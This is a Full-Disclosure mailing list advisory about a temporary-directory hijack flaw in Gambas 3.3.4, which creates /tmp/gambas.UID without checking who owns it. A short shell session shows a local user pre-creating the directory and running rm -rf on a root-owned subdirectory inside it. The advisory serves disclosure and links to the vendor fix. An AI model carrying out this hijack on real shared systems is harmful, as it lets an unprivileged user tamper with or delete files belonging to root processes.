[Full-disclosure] Gambas 3.3.4 Directory hijack vulnerability

["Larry W. Cashdollar" <larry0@xxxxxx>]

<html><body><div><pre><code>Gambas 3.3.4 Directory hijack 
vulnerability<br><br><br>The gambas software package creates a directory in tmp 
to work from without verifying another <br>user hasn't already created it. This 
allows a local user to hijack ownership.  This advisory was taken<br>from the 
bug filed with the developers.<br><br>Describe the problem:<br><br>Gambas 
creates a directory in /tmp called gambas.UID where UID is the user id of the 
person <br>running the software. Gambas doesn't check to see if a malicious 
user has already created that <br>directory.<br><br>A malicious user can then 
manipulate (mv or remove) that directory once gambas has created files 
<br>under it.<br>larry@aliquot:/tmp$ mkdir gambas.0<br>larry@aliquot:/tmp$ ls 
-ld gambas.0<br>drwxr-xr-x 2 larry staff 4096 2012-12-13 16:37 gambas.0 
larry@aliquot:/tmp$ cd gambas.0<br>larry@aliquot:/tmp/gambas.0$ 
ls<br>larry@aliquot:/tmp/gambas.0$ ls -l<br>total 4<br>drwx------ 2 root root 
4096 2012-12-13 16:37 25257 larry@aliquot:/tmp/gambas.0$ rm -rf 25257 
larry@aliquot:/tmp/gambas.0$<br><br>User larry was able to remove the directory 
gambas created as root.<br><br>2) Software Details<br><br>Version: 
gambas3-runtime-3.3.4~lucid2<br>Revision:<br>Operating system: 
Linux<br>Distribution: Ubunt<br>Architecture: x86_64<br>GUI component: QT3 / 
QT4 / GTK+<br>Desktop used: Gnome<br><br>3) Provide a little project that 
reproduces the bug or the crash.<br><br>ubuntu-builder runs as 
root<br><br><br>See bug posted here for details and fix from 
vendor:<br><br>http://code.google.com/p/gambas/issues/detail?id=365<br><br>@_larry0
 Larry W. 
Cashdollar<br><br>http://otiose.dhs.org;<br></code></pre></div></body></html>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/